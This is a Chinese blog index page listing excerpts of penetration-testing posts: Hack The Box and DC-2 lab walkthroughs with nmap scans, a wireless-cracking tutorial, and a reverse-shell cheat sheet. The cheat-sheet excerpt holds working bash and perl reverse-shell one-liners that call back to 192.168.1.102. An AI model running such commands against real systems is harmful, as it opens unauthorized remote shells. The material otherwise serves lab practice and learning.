上一页 1 2 3 4 5 6 ··· 21 下一页
摘要: 正文 nmap扫描结束,看到了不寻常的88和389端口,88端口运行着Kerberos服务,389端口运行着LDAP服务(轻型目录访问协议),Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。LDAP是基于客户/服务器模式的目录数据库。 lao@lao 阅读全文
posted @ 2021-08-15 14:59 东坡肉肉君 阅读(884) 评论(0) 推荐(0) 编辑
摘要: 正文 普普通通的端口,直接访问试试,就一个window server的初试界面,没啥思路,直接上工具 lao@laolao:~/桌面$ sudo nmap -sS -Pn -A 10.10.10.29 Host discovery disabled (-Pn). All addresses will 阅读全文
posted @ 2021-08-12 22:45 东坡肉肉君 阅读(419) 评论(0) 推荐(0) 编辑
摘要: 反弹shell bash -c 'bash -i >& /dev/tcp/192.168.1.102/4444 0>&1' perl -e 'use Socket;$i="192.168.1.102";$p=4555;socket(S,PF_INET,SOCK_STREAM,getprotobyna 阅读全文
posted @ 2021-08-12 21:19 东坡肉肉君 阅读(541) 评论(0) 推荐(0) 编辑
摘要: 正文 端口扫描,更上一题差不多,多了一个ftp lao@laolao:~$ sudo nmap -sS -Pn 10.10.10.46 [sudo] lao 的密码: Host discovery disabled (-Pn). All addresses will be marked 'up' a 阅读全文
posted @ 2021-08-11 20:27 东坡肉肉君 阅读(913) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2021-08-11 14:46 东坡肉肉君 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 正文 User 扫一下端口趴 sudo nmap -sS -A -Pn 10.10.10.28 这个有个80端口开放着尝试访问一下网站,发现了一个登录入口 上sqlmap打一下,当然不用尝试了,打了一下午没打通,dirseacrh也没有什么结果,查了wp才知道这里的密码跟上一题通用的:admin,M 阅读全文
posted @ 2021-08-10 18:49 东坡肉肉君 阅读(170) 评论(0) 推荐(0) 编辑
摘要: 获得4个开放端口,挨个试试趴 lao@laolao:~/桌面$ nmap -PS 10.10.10.27 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 19:06 CST Nmap scan report for localhost (1 阅读全文
posted @ 2021-08-09 19:30 东坡肉肉君 阅读(484) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2021-08-08 23:41 东坡肉肉君 阅读(7) 评论(0) 推荐(0) 编辑
摘要: 本文所有的内容仅供安全研究与教学之用,其余人将信息做其他用途由个人承担全部法律及连带责任,本人不承担任何法律及连带责任 预备 买一个大功率无线网卡,将它接入kali aimon-ng介绍 airmon-ng用来实现无线接口在managed和monitor模式之间的转换。输入不带参数的airmon-n 阅读全文
posted @ 2021-07-20 09:12 东坡肉肉君 阅读(340) 评论(0) 推荐(0) 编辑
摘要: 靶机渗透目标:找寻DC-2靶机中最终的flag。(懒狗拖拖拖了好几天才搞完Orz) 第一步:在网段下使用命令netdiscover去找主机ip netdiscover:二层发现工具,拥有主动和被动发现两种方式 基本用法: -p 被动模式。默默的侦听指定的网卡以发现别的二层主机 -t ARP包发送间隔 阅读全文
posted @ 2021-07-09 14:50 东坡肉肉君 阅读(234) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 21 下一页